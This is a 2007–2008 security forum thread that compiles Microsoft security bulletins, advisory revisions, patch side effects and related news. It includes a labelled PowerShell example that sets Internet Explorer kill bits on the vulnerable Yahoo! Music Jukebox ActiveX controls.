
Non-Security, High-Priority Updates on MU, WU, and WSUS
For this month:
• Microsoft is planning to release three non-security, high-priority updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).
• Microsoft is planning to release zero non-security, high-priority updates for Windows on Windows Update (WU).

Note that this information pertains only to non-security, high-priority updates on Microsoft Update, Windows Update, and Windows Server Update Services released on the same day as the security bulletin summary. Information is not provided about non-security updates released on other days..."

AplusWebMaster
2007-11-15, 18:27
FYI...

- http://www.us-cert.gov/current/#false_microsoft_update_emails_circulating
November 15, 2007 - "US-CERT is aware of false Microsoft Update email messages being publicly circulated. These messages contain multiple links that may direct a user to a malicious web site. The impact of following these links is currently unknown, more information will be provided as it becomes available. US-CERT encourages users to take the following measures to protect themselves:
> Do not follow unsolicited web links in email messages
> Follow the Microsoft guidelines* for recognizing fraudulent email messages ..."
* http://www.microsoft.com/protect/yourself/phishing/msemail.mspx

- http://atlas.arbor.net/briefs/index#-1494625952
Microsoft MS07-055 Trojan Emails
Severity: Elevated Severity
"...The message states that users should install the Kodak Image Viewer patch for advisory MS07-055. The user is directed to a website not owned by Microsoft and told to download a patch. The binary includes the real MS07-055 Windows XP patch, together with a Bandok Trojan. We are working with vendors and security companies to address this issue.
Analysis: This is a potentially serious problem due to the fact that the original Trojan binary is not recognized by any AV tools. Once unpacked, however, the Bandok Trojan is properly recognized by many AV tools. We are working on site takedown."

:fear:

AplusWebMaster
2007-12-05, 16:54
FYI...

A blank Web page is displayed when you start Internet Explorer 7
- http://support.microsoft.com/default.aspx/kb/945385
Last Review: December 4, 2007
Revision: 1.0

Internet Explorer stops responding, stops working, or restarts
Self-help steps for a beginning to an intermediate computer user
- http://support.microsoft.com/gp/pc_ie_intro


(Found at Sandi Hardmeier's "Spyware Sucks" site - thanks Sandi!)
> http://msmvps.com/blogs/spywaresucks/

:cool:

AplusWebMaster
2007-12-06, 20:49
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms07-dec.mspx
Published: December 6, 2007
"...This is an advance notification of -seven- security bulletins that Microsoft is intending to release on December 11, 2007...

Critical (3)

Microsoft Security Bulletin 2
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, DirectX, DirectShow...

Microsoft Security Bulletin 6
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Windows Media Format Runtime...

Microsoft Security Bulletin 7
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Internet Explorer...

Important (4)

Microsoft Security Bulletin 1
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Microsoft Security Bulletin 3
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Microsoft Security Bulletin 4
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Windows...

Microsoft Security Bulletin 5
Maximum Severity Rating: Important
Impact of Vulnerability: Local Elevation of Privilege...
Affected Software: Windows...
---

Microsoft Windows Malicious Software Removal Tool
Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services, and the Download Center.

Non-Security, High-Priority Updates on MU, WU, and WSUS
For this month:
• Microsoft is planning to release -six- non-security, high-priority updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).
• Microsoft is planning to release -one- non-security, high-priority update for Windows on Windows Update (WU).
Note that this information pertains only to non-security, high-priority updates on Microsoft Update, Windows Update, and Windows Server Update Services released on the same day as the security bulletin summary. Information is not provided about non-security updates released on other days..."

AplusWebMaster
2007-12-12, 14:23
FYI...

- http://preview.tinyurl.com/2rtbmz
December 11, 2007 (Symantec Security Response Weblog) - "...Microsoft released seven bulletins this month, covering a total of eleven vulnerabilities. Nine of the vulnerabilities affect Microsoft Vista either directly or through applications running on that operating system..."

> http://forums.spybot.info/showpost.php?p=144071&postcount=31

:fear:

AplusWebMaster
2007-12-12, 14:52
FYI...

- http://www.microsoft.com/presspass/features/2007/dec07/12-11Office2007SP1.mspx
Dec 11, 2007 - "...Customers can download SP1 immediately from http://office.microsoft.com/en-us/downloads/default.aspx . They can also place an order for a CD at http://office.microsoft.com/en-us/default.aspx . At a later date, we also will provide SP1 through automatic update..."
=====================================

Office 2007 SP1 auto-installs confuse Vista, XP users
- http://preview.tinyurl.com/2aysx4
December 13, 2007 (Infoworld) - "Some users have gotten the massive Office 2007 SP1 update automatically, even though Microsoft said it would not use Windows' AU (Automatic Updates) to push out the large upgrade for several months, the company confirmed Thursday. Anyone running a preview copy of Windows Vista Service Pack 1 (SP1), which was made available to all comers only Wednesday, will receive the Office 2007 upgrade automatically. Users of other in-beta Microsoft products, including Windows XP SP3, which is still in limited testing, will also be hit by the Office update, which weighs in at almost 220MB. "As noted to beta customers, if [they] are running Vista SP1 beta software, as part of the beta program, Office 2007 SP1 on pre-release Windows Vista SP1 will automatically install as planned for this beta program," said Bobbie Harder, a senior program manager with the WSUS (Windows Server Update Services) group... even if users of Vista SP1, Windows XP SP3, or WSUS 3.0 SP3 manually installed Office 2007 SP1, AU later automatically installs -- actually re-installs -- the service pack... The next time Windows Update runs, however, Office 2007 SP1 reappears, again checked by default. To strike it off the list, users must right-click the item in the list and choose "hide update."

:fear:

AplusWebMaster
2007-12-12, 15:01
FYI...

Microsoft Security Advisory (944653)
Vulnerability in Macrovision SECDRV.SYS Driver on Windows Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/944653.mspx
Updated: December 11, 2007 - "...We have issued MS07-067* to address this issue..."

* http://www.microsoft.com/technet/security/Bulletin/MS07-067.mspx

:fear:

AplusWebMaster
2007-12-12, 15:41
FYI... (Windows Genuine Annoyance)

- http://support.microsoft.com/kb/892130/en-us
Last Review: December 5, 2007
Revision: 3.8
"...you may be prompted to complete the Windows Genuine Advantage (WGA) validation check process. On the Download Center Web site, you may be prompted to install an ActiveX control when you select a download that is marked with the WGA icon. On the Windows Update Web site, the ActiveX control is a mandatory update..."

.

AplusWebMaster
2007-12-19, 14:47
FYI...

MS07-069 (IE update)... Post Install Issue
- http://preview.tinyurl.com/252f8d
December 18, 2007 (MSRC) - "...We have been investigating public reports of possible problems on systems that have installed the Cumulative Security Update for Internet Explorer (942615),
http://www.microsoft.com/technet/security/bulletin/ms07-069.mspx
released earlier this month. We have some information to share with you regarding the results of our investigation into these reports. First, I want to note the security update does protect against the vulnerabilities noted in the bulletin. If you are not experiencing issues noted in the below referenced Knowledge Base article, no action is needed. We have been working with a small number of customers that reported issues related to the installation of MS07-069. Specifically, on a Windows XP Service Pack 2 (SP2)-based computer, Internet Explorer 6 may stop responding when you try to visit a web site. We’ve made an update to the Knowledge Base article for MS07-069, KB942615, which highlights the known issue.
http://support.microsoft.com/kb/942615
We have also added the following known issue Knowledge Base article KB946627. Because this occurs in a customized installation, this isn’t a widespread issue.
http://support.microsoft.com/kb/946627
Customers who believe they are affected can contact Customer Support Services at no charge using the PC Safety line at 1-866-PCSAFETY (North America). All customers, including those outside the U.S., can visit http://support.microsoft.com/security for assistance."
-----------------------------

- http://secunia.com/advisories/28036/
"...NOTE: This vulnerability is reportedly being actively exploited.
Successful exploitation of the vulnerabilities allows execution of arbitrary code when a user e.g. visits a malicious website..."

> http://www.microsoft.com/technet/security/Bulletin/MS07-069.mspx
• V1.2 (December 18, 2007): Bulletin updated to reflect a known issue; a change to the Removal Information text in the Windows Vista Reference Table in the Security Update Information section; and, a change to the File Information text in the Reference Table within the Security Update Information section for all affected operating systems...

:fear:

AplusWebMaster
2007-12-20, 13:29
What?

XPSP2 w/IE6 registry edit fix for MS07-069
- http://support.microsoft.com/kb/946627
Last Review: December 19, 2007
Revision: 1.0
"...WORKAROUND
Warning: Serious problems might occur if you modify the registry incorrectly by using Registry Editor or by using another method. These problems might require that you reinstall the operating system. Microsoft cannot guarantee that these problems can be solved. Modify the registry at your own risk..."

- http://blogs.msdn.com/ie/archive/2007/12/18/post-install-issues-with-ms07-069-ie6-on-xpsp2.aspx#6806843
December 19, 2007 - "...can Microsoft be serious that the solution is to edit each registry? Is this some sort of joke? It would be easier to have each user install Mozilla Firefox and stop using IE completely."

:sad:

AplusWebMaster
2007-12-21, 14:04
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS07-069.mspx
• V1.3 (December 20, 2007): Bulletin revised to reflect a new Security Update FAQ entry for a known issue documented in KB946627.

IE 6 crashes after you install (MS07-069) security update 942615 on a computer that is running Windows XPSP2
- http://support.microsoft.com/kb/946627/
Last Review: December 21, 2007
Revision: 2.0

:fear:

AplusWebMaster
2008-01-02, 19:54
FYI...

MS Office2003 SP3 disables older file formats
- http://it.slashdot.org/it/08/01/01/137257.shtml
January 02, 2008 - "In Service Pack 3 for Office 2003, Microsoft disabled support for many older file formats. If you have old Word, Excel, 1-2-3, Quattro, or Corel Draw documents, watch out! They did this because the old formats are 'less secure', which actually makes some sense, but only if you got the files from some untrustworthy source. Naturally, they did this by default, and then documented a mind-bogglingly complex workaround (KB 938810*) rather than providing a user interface for adjusting it, or even a set of awkward 'Do you really want to do this?' dialog boxes to click through. And of course because these are, after all, old file formats ... many users will encounter the problem only months or years after the software change, while groping around in dusty and now-inaccessible archives."
* http://support.microsoft.com/kb/938810/en-us
Last Review: December 6, 2007
Revision: 2.0

:nono::crazy:
------------------------------

- http://preview.tinyurl.com/2h5md8
January 05, 2008 (Computerworld) - "Microsoft Corp. apologized to a software rival yesterday for saying its file format posed a security risk and issued new tools to let users of Office 2003 SP3 unblock a host of barred file types. In a posting to his own blog*, David LeBlanc, a senior software development engineer with the Microsoft Office team, admitted the company's mistake in blaming insecure file formats, including the one used by CorelDraw... The revised support document** lists four downloads that users can run to unblock Word, Excel, PowerPoint and Corel files... "We'll try harder to make enabling older formats much more user-friendly in the future," he said."

* http://blogs.msdn.com/david_leblanc/archive/2008/01/04/office-sp3-and-file-formats.aspx
"...The .reg files you can use to change the security settings can be downloaded here..."

** http://support.microsoft.com/kb/938810/en-us
Last Review: January 4, 2008
Revision: 3.0
------------------------------
- http://preview.tinyurl.com/2gkwxt
January 10, 2008 (Computerworld) - "Microsoft Corp. will not post new tools that would allow users of Office 2007 to access blocked file formats, as it has done for customers running Office 2003 Service Pack 3 (SP3). It cited a lack of interest in such tools and said existing work-arounds accomplish the same thing... the Office Web site* explains how to set up a "trusted location," a special folder on a local or network drive. Files in a trusted folder aren't checked by Office 2007's security tools before opening, and thus the older file formats open normally..."
* http://office.microsoft.com/en-us/help/HA100319991033.aspx

:clown:

AplusWebMaster
2008-01-03, 22:57
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-jan.mspx
January 3, 2008
"...This is an advance notification of -two- security bulletins that Microsoft is intending to release on January 8, 2008... The security bulletins for this month are as follows, in order of severity:

Critical (1)

Microsoft Security Bulletin 1
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Important (1)

Microsoft Security Bulletin 2
Maximum Severity Rating: Important
Impact of Vulnerability: Local Elevation of Privilege...
Affected Software: Windows...

Other...
Microsoft Windows Malicious Software Removal Tool
Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services, and the Download Center.

Non-Security, High-Priority Updates on MU, WU, and WSUS
For this month:
• Microsoft is planning to release -five- non-security, high-priority updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).
• Microsoft is planning to release -two- non-security, high-priority updates for Windows on Windows Update (WU) and WSUS.
Note that this information pertains only to non-security, high-priority updates on Microsoft Update, Windows Update, and Windows Server Update Services released on the same day as the security bulletin summary. Information is not provided about non-security updates released on other days..."

AplusWebMaster
2008-01-08, 20:34
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-jan.mspx
January 8, 2008
"This bulletin summary lists security bulletins released for January 2008...

Critical (1)

Microsoft Security Bulletin MS08-001
Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (941644)
- http://www.microsoft.com/technet/security/bulletin/ms08-001.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...

Important (1)

Microsoft Security Bulletin MS08-002
Vulnerability in LSASS Could Allow Local Elevation of Privilege (943485)
- http://www.microsoft.com/technet/security/bulletin/ms08-002.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Local Elevation of Privilege...

Other...

Microsoft Windows Malicious Software Removal Tool
Microsoft has released an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services, and the Download Center.

Non-Security, High-Priority Updates on MU, WU, and WSUS
• Microsoft has released -five- non-security, high-priority updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).
• Microsoft has released -two- non-security, high-priority updates for Windows on Windows Update (WU) and WSUS.

Note that this information pertains only to non-security, high-priority updates on Microsoft Update, Windows Update, and Windows Server Update Services released on the same day as the security bulletin summary. Information is not provided about non-security updates released on other days..."
---------------------

ISC Analysis
- http://isc.sans.org/diary.html?storyid=3819
Last Updated: 2008-01-08 18:25:59 UTC

AplusWebMaster
2008-01-09, 19:17
FYI...

Microsoft Security Advisory (943411)
Update to Improve Windows Sidebar Protection
- http://www.microsoft.com/technet/security/advisory/943411.mspx
January 8, 2008 - "An update is available for currently supported editions of the Windows Vista operating system. The update to improve Windows Sidebar Protection enables Windows Sidebar to help block gadgets from running in Sidebar. For more information about installing this update, see Microsoft Knowledge Base Article 943411*. For more information about how Windows Sidebar Protection helps block installed gadgets from running in Windows Sidebar, see Microsoft Knowledge Base Article 941411**..."

* http://support.microsoft.com/kb/943411

** http://support.microsoft.com/kb/941411

AplusWebMaster
2008-01-10, 17:35
The following bulletins have undergone a -minor- revision increment.

* MS07-064 - Critical
Vulnerabilities in DirectX Could Allow Remote Code Execution (941568)
- http://www.microsoft.com/technet/security/bulletin/ms07-064.mspx
- Reason for Revision: Bulletin updated to remove known issues notation. This update does not have any known issues.
- Originally posted: December 11, 2007
- Updated: January 9, 2008
- Bulletin Severity Rating: Critical
- Version: 1.3

* MS07-057 - Critical
Cumulative security update for Internet Explorer
- http://www.microsoft.com/technet/security/bulletin/ms07-057.mspx
- Reason for Revision: Revised to add a known issue.
(Known issues since original release of the bulletin:
• KB904710*: WinINet ignores the policies that you set when you create a custom administrative template file in Windows XP with Service Pack 2 - * http://support.microsoft.com/kb/904710 )
- Originally posted: October 9, 2007
- Updated: January 9, 2008
- Bulletin Severity Rating: Critical
- Version: 1.2

The following bulletins have undergone a -major- revision increment.

* MS07-042 - Critical
Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (936227)
- http://www.microsoft.com/technet/security/bulletin/ms07-042.mspx
- Reason for Revision: Bulletin updated: Added Microsoft Word Viewer 2003 as an affected product. Also added an Update FAQ clarifying the kill bit for Microsoft XML Parser 2.6 and its applicability to this security update.
- Originally posted: August 14, 2007
- Updated: January 9, 2008
- Bulletin Severity Rating: Critical
- Version: 3.0

.

AplusWebMaster
2008-01-11, 21:30
FYI...

Microsoft Security Advisory (945713)
Vulnerability in Web Proxy Auto-Discovery (WPAD) Could Allow Information Disclosure
- http://www.microsoft.com/technet/security/advisory/945713.mspx
Updated: January 9, 2008
Revisions:
• December 3, 2007: Advisory published.
• January 9, 2008: Advisory updated: The registry key for the Configure a Domain Suffix Search List workaround has been corrected to the proper key of SearchList.

.

AplusWebMaster
2008-01-13, 06:08
FYI... ThreatCon Level is 2

- http://www.symantec.com/avcenter/threatcon/learnabout.html
"The ThreatCon is currently at Level 2 in response to the disclosure of a critical remote vulnerability affecting the default configurations of Windows XP and Windows Vista. Nondefault configurations of Windows 2003 are also affected... The MS08-001 bulletin also addresses a remote kernel-based denial-of-service issue affecting nondefault configurations of Windows 2000, XP, and 2003. IBM Internet Security Systems, the team that discovered these kernel-based flaws, has recently released an official advisory* suggesting that the ICMP-based flaw, which Microsoft has considered a low-severity, denial-of-service issue, may in fact be exploitable to execute code. However, we have not confirmed this. Windows 2000 users who are not affected by the critical vulnerability may want to reevaluate their stance on patching the lower-severity issue in light of this new information. The MS08-002 bulletin was also released to address a local privilege-escalation vulnerability affecting LSASS. Users are advised to review the Microsoft Security Bulletins and to apply the patches as soon as possible..."

* Multiple (3) Microsoft Windows TCP/IP Remote Code Execution and DoS Vulnerabilities
- http://iss.net/threats/282.html

* "...An attacker does not need to invoke any kind of user interaction to exploit this vulnerability. The lack of user interaction, widespread availability of the protocols, and the possibility of complete compromise of targeted systems means that administrators should treat this vulnerability as highly critical. The lack of user interaction makes this exploit a probable target for botnets, such as the Storm Worm. Administrators should monitor the signatures listed in the ISS Coverage section for any attempted worm or botnet activity. Administrators should also keep in mind that multicast traffic is usually received by multiple destinations, so a single stream of attack traffic would likely affect more than one target..."

:fear:

AplusWebMaster
2008-01-14, 19:08
FYI...

Windows Vista Application Compatibility Update
- http://support.microsoft.com/kb/943302
Last Review: January 11, 2008
Revision: 2.0

.

AplusWebMaster
2008-01-16, 13:44
FYI...

Microsoft Security Advisory (947563)
Vulnerability in Microsoft Excel Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/947563.mspx
January 15, 2008 - "Microsoft is investigating new public reports of a vulnerability in Microsoft Office Excel 2003 Service Pack 2, Microsoft Office Excel Viewer 2003, Microsoft Office Excel 2002, Microsoft Office Excel 2000, and Microsoft Excel 2004 for Mac. At this time, our initial investigation indicates that customers who are using Microsoft Office Excel 2007 or Microsoft Excel 2008 for Mac, or who have installed Microsoft Office Excel 2003 Service Pack 3 are not affected by this vulnerability. Microsoft is investigating the public reports and customer impact. Upon completion of this investigation, Microsoft will take the appropriate action... At this time, we are aware only of targeted attacks that attempt to use this vulnerability. Additionally, as the issue has not been publicly disclosed broadly, we believe the risk at this time to be limited...
Note: There are no known workarounds for Microsoft Office Excel 2002 or Microsoft Office Excel 2000 at this time..."

- http://isc.sans.org/diary.html?storyid=3854
Last Updated: 2008-01-16 02:54:29 UTC - "... The vulnerability is, according to the blog*, already actively exploited by targeted attacks. Excel 2003SP3 and Excel 2007 are not affected, but most other versions are."
* http://blogs.technet.com/msrc/archive/2008/01/15/msrc-blog-security-advisory-947563.aspx

- http://secunia.com/advisories/28506/
Release Date: 2008-01-16
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched...

:fear:

AplusWebMaster
2008-01-18, 15:38
FYI...

- http://preview.tinyurl.com/364gvn
January 17, 2008 (Infoworld) - "...The code is not available to the general public (Ed. note: "Yet"). It was released Thursday to security professionals who use Immunity's Canvas computer security testing software. It causes the Windows system to crash but does not let the attacker run malicious software on the victim's system... The bug is particularly troublesome for two reasons. First, it affects a widely used Windows component that is turned on by default. Worse, no user interaction is required to trigger the flaw, meaning that it could be exploited in a self-copying worm attack. MS patched the flaw in its MS08-001 update**, released last week, but it takes time for enterprise users to test and install Microsoft's patches..."
* http://seclists.org/dailydave/2008/q1/0017.html
17 Jan 2008

** http://www.microsoft.com/technet/security/bulletin/ms08-001.mspx
January 8, 2008 - Critical

- http://atlas.arbor.net/briefs/index#1659842965
January 17, 2008 - "...Analysis: Like we anticipated, an exploit is now available in limited release. However, this issue should not affect too many networks, as the attackers need subnet access to send the traffic to the victim..."

:fear:

AplusWebMaster
2008-01-24, 19:03
FYI...

Microsoft Security Bulletin MS08-001 – Critical
Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (941644)
- http://www.microsoft.com/technet/security/Bulletin/MS08-001.mspx
• V2.0 (January 23, 2008): Bulletin updated to add Windows Small Business Server 2003 Service Pack 2 as an affected product. Also added an FAQ to clarify that current Microsoft detection and deployment tools already correctly offer the update to Windows Small Business Server 2003 Service Pack 2 customers.

:fear:

AplusWebMaster
2008-01-25, 13:06
FYI... Microsoft Security Bulletin Re-Releases and Revisions

Microsoft Security Bulletin MS07-057 - Critical
Cumulative Security Update for Internet Explorer (939653)
- http://www.microsoft.com/technet/security/bulletin/ms07-057.mspx
• V1.0 (October 9, 2007): Bulletin published.
• V1.1 (October 10, 2007): Bulletin revised to correct the "What does the update do?" section for CVE-2007-3893.
• V1.2 (January 09, 2008): Bulletin revised to add a known issue.
• V1.3 (January 23, 2008): Bulletin revised to address rendering issues.

Microsoft Security Bulletin MS07-064 – Critical
Vulnerabilities in DirectX Could Allow Remote Code Execution (941568)
- http://www.microsoft.com/technet/security/bulletin/ms07-064.mspx
• V1.0 (December 11, 2007): Bulletin published.
• V1.1 (December 12, 2007): Bulletin updated to reflect that DirectX that ships on Windows 2000 is not supported by SMS 2.0 unless the Extended Security Update Inventory Tool (ESUIT) is used.
• V1.2 (December 19, 2007): Bulletin updated to reflect a change to the Removal Information text in the Windows Vista Reference Table portion of the Security Update Information section. Also removed the web-based mitigation from vulnerability CVE-2007-3901.
• V1.3 (January 9, 2008): Bulletin updated to remove known issues notation. This update does not have any known issues.
• V2.0 (January 23, 2008): Bulletin updated to reflect that the update for DirectX 9.0 also applies to DirectX 9.0b and DirectX 9.0c.

Microsoft Security Bulletin MS07-068 - Critical
Vulnerability in Windows Media File Format Could Allow Remote Code Execution (941569 and 944275)
- http://www.microsoft.com/technet/security/bulletin/ms07-068.mspx
• V1.0 (December 11, 2007): Bulletin published...
• V1.2 (January 23, 2008): Bulletin updated to add an FAQ regarding installing the updates for Windows Media Format Runtime 9.5 on Windows XP Professional x64 Edition.

Microsoft Security Bulletin MS08-001 – Critical
Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (941644)
- http://www.microsoft.com/technet/security/bulletin/ms08-001.mspx
• V1.0 (January 8, 2008): Bulletin published.
• V2.0 (January 23, 2008): Bulletin updated to add Windows Small Business Server 2003 Service Pack 2 as an affected product. Also added an FAQ to clarify that current Microsoft detection and deployment tools already correctly offer the update to Windows Small Business Server 2003 Service Pack 2 customers.

AplusWebMaster
2008-01-28, 10:44
FYI...

Microsoft Security Bulletin MS08-001 – Critical
Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (941644)
- http://www.microsoft.com/technet/security/bulletin/ms08-001.mspx
• V3.0 (January 25, 2008): This bulletin was revised to clarify the impact of Windows Kernel TCP/IP/IGMPv3 and MLDv2 Vulnerability (CVE-2007-0069*) on supported editions of Windows Small Business Server 2003 and Windows Home Server. Also included is an explanation and clarification that current Microsoft detection and deployment tools already correctly offer the update to systems running Windows Small Business Server 2003 and Windows Home Server.
* http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0069

:fear::lip:

AplusWebMaster
2008-01-30, 19:05
FYI...

- http://preview.tinyurl.com/26fx8c
January 30, 2008 (Computerworld) - "... On Tuesday, Immunity Inc. updated a working exploit for the TCP/IP flaw spelled out Jan. 8 in Microsoft's MS08-001 security bulletin, and posted a Flash demonstration of the attack on its Web site. The exploit, which was released to customers of its CANVAS penetration testing software - but is not available to the public - was a revised version of code first issued two weeks ago... Other security companies reacted to the revamped attack code and Flash proof by issuing new alerts. Symantec Corp., for instance, sent a new warning to customers of its DeepSight threat network... It urged users who have not already deployed the patches Microsoft issued Jan. 8 to do (so) immediately..."

:fear:

AplusWebMaster
2008-02-01, 14:28
FYI...

- http://news.yahoo.com/s/ap/20080201/ap_on_hi_te/microsoft_yahoo_9
Feb. 1, 2008 - REDMOND, Wash. - "Microsoft Corp. is offering $44.6 billion in cash and stock for search engine operator Yahoo Inc. in a move to boost its competitive edge in the online services market. The unexpected announcement Friday comes as Microsoft, the world's biggest software company, seeks new ways to compete more effectively against the search and online advertising powerhouse Google Inc. In a letter to Yahoo's board of directors, Microsoft Chief Executive Steve Ballmer said the company will bid $31 per share, representing a 62 percent premium to Yahoo's closing stock price Thursday..."

- http://www.reuters.com/article/technologyNews/idUSWNAS894220080201?sp=true
Feb. 1, 2008 - "...Skeptics say Microsoft and Yahoo have very different corporate cultures and worry about a clash such as the one that marred AOL's $182 billion purchase of Time Warner in 2001, which is seen as the worst merger in recent history..."

:lip:

AplusWebMaster
2008-02-04, 23:45
FYI...

- http://secunia.com/advisories/28715
Last Update: 2008-02-05
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch
Software: MySpace Uploader Control 1.x
...The vulnerability is confirmed in MySpaceUploader.ocx version 1.0.0.5 and reported in version 1.0.0.4. Other versions may also be affected.
Solution: Update to version 1.0.0.6. <<<

- http://secunia.com/advisories/28713/
Release Date: 2008-02-04
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch
Software: Facebook Photo Uploader 4.x
...The vulnerability is confirmed in version 4.5.57.0. Other versions may also be affected.
Solution: Update to version 4.5.57.1. <<<

- http://secunia.com/advisories/28757/
Last Update: 2008-02-07
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Software: Yahoo! Music Jukebox 2.x...
NOTE: Working exploit code is publicly available.
The vulnerabilities are confirmed in Yahoo! Music Jukebox version 2.2.2.056. Other versions may also be affected...
Solution: Set the kill-bit for the affected ActiveX controls. <<<
Other References:
US-CERT VU#101676: http://www.kb.cert.org/vuls/id/101676
US-CERT VU#340860: http://www.kb.cert.org/vuls/id/340860
---------------------
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0623
release date: 2/6/2008 - YMP Datagrid ActiveX control (datagrid.dll)
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0624
release date: 2/6/2008 - YMP Datagrid ActiveX control (datagrid.dll)
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0625
release date: 2/6/2008 - MediaGrid ActiveX control (mediagrid.dll)

:fear:
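
Added example for the "set the kill-bit" advice in the Yahoo! Music Jukebox advisory above. This is not code from Secunia, Yahoo or Microsoft; it is an illustration of the standard Internet Explorer kill-bit mechanism. The only input taken from the advisory is the two DLL names (datagrid.dll, mediagrid.dll); the CLSIDs are looked up from the local registry rather than hard-coded, since the advisory quoted here does not list them. Function and variable names are this example's own. Run from an elevated PowerShell prompt.

```powershell
# Added example (not from the page or any vendor): find the CLSIDs registered for the
# DLLs named in the advisory and set the IE kill bit on each, in both the native and,
# on x64, the WOW6432Node view of the ActiveX Compatibility key.
$KillBitFlag = 0x400   # COMPAT_EVIL_DONT_LOAD bit in the "Compatibility Flags" DWORD

function Get-ClsidByDll {
    # Walk HKCR\CLSID and emit every CLSID whose InprocServer32 path ends in one of $Dll.
    param([Parameter(Mandatory)][string[]]$Dll)
    $wanted = $Dll | ForEach-Object { $_.ToLowerInvariant() }
    foreach ($key in Get-ChildItem 'Registry::HKEY_CLASSES_ROOT\CLSID' -ErrorAction SilentlyContinue) {
        $srv = Get-ItemProperty -Path "$($key.PSPath)\InprocServer32" -ErrorAction SilentlyContinue
        if (-not $srv) { continue }
        $path = ([string]$srv.'(default)').ToLowerInvariant()
        foreach ($d in $wanted) {
            if ($path.EndsWith($d)) {
                [pscustomobject]@{ Clsid = $key.PSChildName; Server = $path }
            }
        }
    }
}

function Set-KillBit {
    # OR the kill bit into Compatibility Flags so any other flags already set are kept.
    param([Parameter(Mandatory)][string]$Clsid)
    $bases = @('HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility')
    if ([Environment]::Is64BitOperatingSystem) {
        # 32-bit IE on a 64-bit OS reads the WOW6432Node view
        $bases += 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
    }
    foreach ($base in $bases) {
        $key = Join-Path $base $Clsid
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        $current = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
        $new = ([int]$current) -bor $KillBitFlag    # [int]$null is 0 when the value is absent
        Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $new -Type DWord
    }
}

function Test-KillBit {
    # True when the kill bit is present in the native view of the key.
    param([Parameter(Mandatory)][string]$Clsid)
    $key = Join-Path 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility' $Clsid
    $flags = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    return ((([int]$flags) -band $KillBitFlag) -ne 0)
}

# DLL names from the advisory; everything below reports what was found and changed.
$targets = Get-ClsidByDll -Dll 'datagrid.dll', 'mediagrid.dll'
if (-not $targets) { Write-Warning 'No CLSID registered for those DLLs on this machine'; return }
foreach ($t in $targets) {
    Set-KillBit -Clsid $t.Clsid
    '{0} ({1}) kill bit set: {2}' -f $t.Clsid, $t.Server, (Test-KillBit -Clsid $t.Clsid)
}
```

Two caveats worth keeping in mind: the kill bit only stops Internet Explorer (and other hosts that honour the ActiveX Compatibility key) from instantiating the control, it does not remove or patch the DLL; and it is keyed on CLSID, so a vendor fix that ships a new CLSID will not be blocked, while an unchanged CLSID stays blocked until the flag is cleared.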

AplusWebMaster
2008-02-07, 06:49
FYI...

- http://isc.sans.org/diary.html?storyid=3946
Last Updated: 2008-02-07 02:13:00 UTC - "Just a quick reminder to those in the corporate world and using WSUS. From a technet update email Volume 10, Issue 3: February 6, 2008

"...On February 12, 2008 Microsoft will release the Windows Internet Explorer 7 Installation and Availability update to Windows Server Update Services (WSUS). Windows Internet Explorer 7 Installation and Availability Update is a complete installation package that will upgrade machines running Internet Explorer 6 to Windows Internet Explorer 7. Customers who have configured WSUS to "auto-approve" Update Rollup packages will automatically upgrade machines running Internet Explorer 6 to Windows Internet Explorer 7 after February 12, 2008 and consequently, may want to read Knowledge Base article 946202 [links to http://go.microsoft.com/?linkid=8250930 ] to manage how and when this update is installed. For more on the Windows Internet Explorer 7 Installation and Availability Update, read Knowledge Base article 940767 [links to http://go.microsoft.com/?linkid=8250931 ]..."

There are still many organisations that use IE6 because of internal applications that may not work with IE 7 or alternate browsers. So if you use WSUS and have a need to stay with IE6, you should check out the knowledge base articles. Otherwise the 13th is not going to be a happy day for you."

